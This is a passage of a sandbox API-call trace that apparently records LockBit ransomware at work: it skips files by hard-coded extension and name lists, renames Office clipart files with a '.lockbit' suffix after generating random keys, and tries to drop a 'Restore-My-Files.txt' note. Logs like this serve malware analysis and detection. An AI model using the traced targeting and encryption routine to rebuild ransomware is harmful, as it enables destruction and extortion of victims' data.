dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.810] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5661b6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1476, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0240291.WMF", cAlternateFileName="")) returned 1 [0153.814] lstrcmpiW (lpString1=".", lpString2="J0240291.WMF") returned -1 [0153.814] lstrcmpiW (lpString1="..", lpString2="J0240291.WMF") returned -1 [0153.814] PathFindExtensionW (pszPath="J0240291.WMF") returned=".WMF" [0153.815] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.815] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.816] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.816] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.817] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.817] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0240291.WMF") returned 1 [0153.817] lstrcmpiW (lpString1="ntldr", lpString2="J0240291.WMF") returned 1 [0153.817] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0240291.WMF") returned 1 [0153.817] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0240291.WMF") returned -1 [0153.817] lstrcmpiW (lpString1="autorun.inf", lpString2="J0240291.WMF") returned -1 [0153.817] lstrcmpiW (lpString1="thumbs.db", lpString2="J0240291.WMF") returned 1 [0153.817] lstrcmpiW (lpString1="iconcache.db", lpString2="J0240291.WMF") returned -1 [0153.817] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.817] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240291.WMF") returned=".WMF" [0153.817] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.817] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.817] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.817] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.817] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.817] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.817] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.817] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.817] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.817] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.817] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.817] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.817] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.818] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.818] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.818] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.818] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.818] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.818] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.818] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.818] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.818] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.818] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.818] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.818] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.818] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.818] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.818] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.818] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240291.WMF.lockbit") returned 72 [0153.818] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240291.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0240291.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.819] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.819] malloc (_Size=0x40068) returned 0x3df0008 [0153.819] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5238) returned 1 [0153.820] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.820] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.820] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.821] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.821] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.823] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240291.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240291.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.823] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.823] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.825] free (_Block=0x1fa2ed8) [0153.825] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240291.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.825] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.825] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.825] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90da9400, ftCreationTime.dwHighDateTime=0x1be9cda, ftLastAccessTime.dwLowDateTime=0x660ca390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x90da9400, ftLastWriteTime.dwHighDateTime=0x1be9cda, nFileSizeHigh=0x0, nFileSizeLow=0x92e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0241019.WMF", cAlternateFileName="")) returned 1 [0153.825] lstrcmpiW (lpString1=".", lpString2="J0241019.WMF") returned -1 [0153.825] lstrcmpiW (lpString1="..", lpString2="J0241019.WMF") returned -1 [0153.825] PathFindExtensionW (pszPath="J0241019.WMF") returned=".WMF" [0153.825] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.825] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.825] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.825] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.826] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.827] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.827] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.828] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.828] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.828] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0241019.WMF") returned 1 [0153.828] lstrcmpiW (lpString1="ntldr", lpString2="J0241019.WMF") returned 1 [0153.828] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0241019.WMF") returned 1 [0153.828] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0241019.WMF") returned -1 [0153.828] lstrcmpiW (lpString1="autorun.inf", lpString2="J0241019.WMF") returned -1 [0153.828] lstrcmpiW (lpString1="thumbs.db", lpString2="J0241019.WMF") returned 1 [0153.828] lstrcmpiW (lpString1="iconcache.db", lpString2="J0241019.WMF") returned -1 [0153.828] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.828] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241019.WMF") returned=".WMF" [0153.828] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.828] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.828] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.828] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.828] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.828] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.828] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.828] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.829] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.830] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241019.WMF.lockbit") returned 72 [0153.830] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241019.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241019.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0153.831] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.831] malloc (_Size=0x40068) returned 0x3f70048 [0153.832] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=2350) returned 1 [0153.832] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.833] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0153.833] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.833] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0153.833] ReadFile (in: hFile=0x2a4, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0153.838] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241019.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241019.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.838] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.838] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.840] free (_Block=0x1fa2ed8) [0153.840] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241019.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.840] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.840] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.840] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cc65600, ftCreationTime.dwHighDateTime=0x1be9cda, ftLastAccessTime.dwLowDateTime=0x5661b6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9cc65600, ftLastWriteTime.dwHighDateTime=0x1be9cda, nFileSizeHigh=0x0, nFileSizeLow=0xa4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0241037.WMF", cAlternateFileName="")) returned 1 [0153.840] lstrcmpiW (lpString1=".", lpString2="J0241037.WMF") returned -1 [0153.840] lstrcmpiW (lpString1="..", lpString2="J0241037.WMF") returned -1 [0153.840] PathFindExtensionW (pszPath="J0241037.WMF") returned=".WMF" [0153.840] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.840] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.840] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.840] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.840] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.840] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.840] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.841] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.842] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.842] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0241037.WMF") returned 1 [0153.842] lstrcmpiW (lpString1="ntldr", lpString2="J0241037.WMF") returned 1 [0153.842] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0241037.WMF") returned 1 [0153.843] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0241037.WMF") returned -1 [0153.843] lstrcmpiW (lpString1="autorun.inf", lpString2="J0241037.WMF") returned -1 [0153.843] lstrcmpiW (lpString1="thumbs.db", lpString2="J0241037.WMF") returned 1 [0153.843] lstrcmpiW (lpString1="iconcache.db", lpString2="J0241037.WMF") returned -1 [0153.843] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.843] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241037.WMF") returned=".WMF" [0153.843] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.843] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.843] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.843] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.843] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.843] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.843] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.843] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.843] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.843] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.843] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.843] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.843] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.843] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.844] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.844] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.844] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.844] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.844] 